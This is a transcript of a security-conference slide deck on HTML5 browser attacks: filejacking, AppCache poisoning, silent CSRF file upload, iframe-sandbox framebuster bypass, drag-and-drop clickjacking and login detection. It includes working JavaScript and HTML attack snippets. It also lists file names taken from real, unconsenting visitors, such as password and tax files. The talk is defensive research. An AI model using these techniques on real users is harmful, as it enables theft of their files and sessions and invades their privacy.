Krzysztof kotowicz. something wicked this way comes
1 like1,286 views
Krzysztof Kotowicz presented several ways that HTML5 and user interaction could be abused by attackers: - Filejacking allows uploading files from a user's system without consent by tricking them into selecting a folder. Sensitive files were taken from actual victims. - AppCache poisoning can be used to persist malicious payloads on a user's system by tampering with application manifest files during a man-in-the-middle attack. - Silent file upload constructs arbitrary files in JavaScript and uploads them to a victim site using cross-origin resource sharing if CSRF is possible. This was demonstrated against a real website. - IFRAME sandboxing and drag-and-drop
Krzysztof kotowicz. something wicked this way comes
- 1. Something wicked this way comes Krzysztof Kotowicz, SecuRing kkotowicz@securing.pl @kkotowicz
- 2. Plan • HTML5 trickery • Filejacking • AppCache poisoning • Silent file upload • IFRAME sandbox aniframebuster • Don’t get framed! • Drag into • Drag out content extraction • Frame based login detection • Wrap-up 2
- 3. HTML5 trickery 3
- 4. Filejacking • HTML5 directory upload (Chrome only) <input type=file directory> • displays this ====> • JS gets read access to all files within chosen folder 4
- 5. Filejacking Business plan • set up tempting webpage • overlay input (CSS) with • wait for clueless users • get files & upload them to your server 5
- 6. Filejacking 6
- 7. Filejacking 7
- 8. Filejacking • How clueless users actually are? • http://kotowicz.net/wu running for ~13 mo • very limited exposure • only websec oriented visitors • 298 clients connected (217 IPs) • tons of interesting files 8
- 9. Filejacking LOTS of these ------ > • Downloads/# BeNaughtyLive.com/ • Downloads/# GoLiveTrannies.com/ • BratSluts 11 12 04 Sasha Cane Red Tartan SchoolGirl XXX 720p WMV SEXORS.nzb • bitches/1300563524557.jpg 9
- 10. Filejacking • websec staff! • but surely no private data? 10
- 11. Filejacking • Wireless Assess points.txt • interesting network next to me.txt • onlinePasswords.txt • s/pw.txt • letter of authorization.pdf • Staff-<name,surname>.pdf • <name,surname> - resume.doc • PIT-37, <name,surname>.PITY2010NG • Deklaracja_VAT7_Luty_2011.pdf • Pricing-Recommendation_CR.xlsm.zip • but surely no clients data? 11
- 12. Filejacking • sony reports/ • Faktura_numer_26_2011_ 0045_sonymusic.##.zip <company>.pdf • SecurityQA.SQL.Injection. • websec cred~ Results.v1.1.docx • security_users.sql.zip • SSOCrawlTest5.4.097.xml • !important - questions for • IPS CDE Wireless Audit- web developers.docx January 2011-1 0.docx • sslstrip.log~ • IPS Wireless Testing • ##### Paros Log.txt Schedule April 2011.xls • 01-####### Corporation (Security Unarmed So much for the Guard).xls NDAs... 12
- 13. Filejacking + All your file are belong to me + Trivial to set up + Filter files by e.g. extension, size etc. - Chrome only - Requires users prone to social- engineering 13
- 14. AppCache poisoning HTML5 Offline Web Applications <html manifest=cache.manifest> • cache.manifest lists URLs to cache • cache expires only when CACHE MANIFEST index.html manifest is changed stylesheet.css images/logo.png scripts/main.js https://github.com/koto/sslstrip 14
- 15. AppCache poisoning • abuse to persist man-in-the-middle • manifest must be MIME text/cache-manifest • Chrome fills AppCache without user confirmation • two steps • poison AppCache while m-i-t-m • have payloads stay forever in cache 15
- 16. AppCache poisoning • tamper http://victim/ <html manifest=/robots.txt> <script>evil()</script> • tamper http://victim/robots.txt CACHE MANIFEST CACHE: http://victim/ NETWORK: * 16
- 17. AppCache poisoning Later on, after m-i-t-m: 1. http://victim/ fetched from AppCache 2. browser checks for new manifest GET /robots.txt 3. receives text/plain robots.txt & ignores it 4. tainted AppCache is still used 17
- 18. AppCache poisoning + Poison any URL + Payload stays until manually removed - Chrome or Firefox with user interaction - Needs active man-in-the-middle 18
- 19. Silent file upload • File upload purely in Javascript • Emulates <input type=file> with: • any file name • any file content • File constructed in Javascript • Uses Cross Origin Resource Sharing 19
- 20. Silent file upload • Cross Origin Resource Sharing = cross domain AJAX http://attacker.com/ var xhr = new XMLHttpRequest(); xhr.open("POST", "http://victim", true); xhr.setRequestHeader("Content-Type", "text/plain"); xhr.withCredentials = "true"; // send cookies xhr.send("Anything I want"); 20
- 21. Silent file upload • raw multipart/form-data request function fileUpload(url, fileData, fileName) { var boundary = "xxxxxxxxx", xhr = new XMLHttpRequest(); xhr.open("POST", url, true); xhr.withCredentials = "true"; xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary); 21
- 22. Silent file upload var b = " --" + boundary + 'rn Content-Disposition: form-data; name="contents"; filename="' + fileName + '"rn Content-Type: application/octet-streamrn rn ' + fileData + 'rn --' + boundary + '--'; xhr.setRequestHeader("Content-Length", b.length); xhr.send(b); 22
- 23. Silent file upload + No user interaction + Works in most browsers + You can add more form fields - CSRF flaw needed - No access to response 23
- 24. Silent file upload DEMO Flickr.com 24
- 25. Silent file upload • GlassFish Enterprise Server 3.1. • CVE 2012-0550 by Roberto Suggi Liverani • //goo.gl/cOu1F logUrl = 'http://glassfishserver/ management/domain/applications/ application'; fileUpload(c,"maliciousarchive.war"); • logged admin + CSRF = RCE 25
- 26. IFRAME sandbox aniframebuster • Used to embed untrusted content sandbox=" allow-same-origin allow-scripts allow-forms allow-top-navigation" • prevents JS execution in frame • prevents defacement • Facilitates clickjacking! 26
- 27. Clickjacking? ⌚→ 27
- 28. IFRAME sandbox aniframebuster http://attacker.com <iframe sandbox=" allow-forms allow-scripts" src="//victim"></iframe> http://victim top.location = self.location // doesn’t work:( 28
- 29. IFRAME sandbox aniframebuster + Chrome / Safari / IE 10 + Will disable most JS framebusters - X-Frame-Options 29
- 30. Don’t get framed! 30
- 31. Same origin policy • makes web (relatively) safe • restricts cross-origin communication • can be relaxed though • crossdomain.xml • document.domain • HTML5 Cross Origin Resource Sharing • or ignored... • UI redressing 31
- 32. UI Redressing? Jedi mind tricks on victim users 32
- 33. UI Redressing • This is not the page you’re looking at • This is not the thing you’re clicking • .................................................. dragging • .................................................. typing • .................................................. copying • Victims attack the applications for us 33
- 34. Exploiting users //goo.gl/DgPpY 34
- 35. Drag into • Put attackers content into victim form 35
- 36. Drag into DEMO Alphabet Hero 36
- 37. Drag into + Inject arbitrary content + Trigger self-XSS - Firefox only (will die soon!) - X-Frame-Options 37
- 38. Drag out content extraction image image 38
- 39. Drag out content extraction image victim <iframe> image 39
- 40. Drag out content extraction image victim <iframe> textarea <textarea> 40
- 41. Drag out content extraction <div id=game style="position:relative"> <img style="position:absolute;..." src="paper.png" /> <img style="position:absolute;..." src="trash.png" /> <iframe scrolling=no id=iframe style="position:absolute;opacity:0;..."> </iframe> <textarea style="position:absolute; opacity:0;..." id=dropper></textarea> </div> 41
- 42. Drag out content extraction 42
- 43. Drag out content extraction 43
- 44. Drag out content extraction + Access sensitive content cross domain - Firefox only (will die soon!) - X-Frame-Options 44
- 45. Frame-based login detection • Are you now logged in to these websites? • facebook.com • amazon.com • a-banking-site.secure • Why should I care? • e.g. launch CSRF / other attacks 45
- 46. Frame-based login detection • Previous work: • Cache timing, lcamtuf • Abusing HTTP Status Code, Mike Cardwell • Anchor Element Position Detection, Paul Stone <iframe src=// victim/#logout /> 46
- 47. Frame-based login detection 47
- 48. Frame-based login detection <iframe src="//victim/login"> //victim /login <input id=login> <script> document.getElementById('login').focus() </script> 48
- 49. Frame-based login detection DEMO 49
- 50. Summary • HTML5 is attacker’s friend too! • Don’t get framed • Users based pwnage FTW Developers: Use X-Frame-Options: DENY 50
- 51. Links • html5sec.org • code.google.com/p/html5security • www.contextis.co.uk/research/white-papers/clickjacking • blog.kotowicz.net • github.com/koto Twitter: @kkotowicz kkotowicz@securing.pl Thanks @0x6D6172696F, @garethheyes, @theKos, @7a_, @lavakumark, @malerisch, @skeptic_fx, .... 51
- 52. ? 52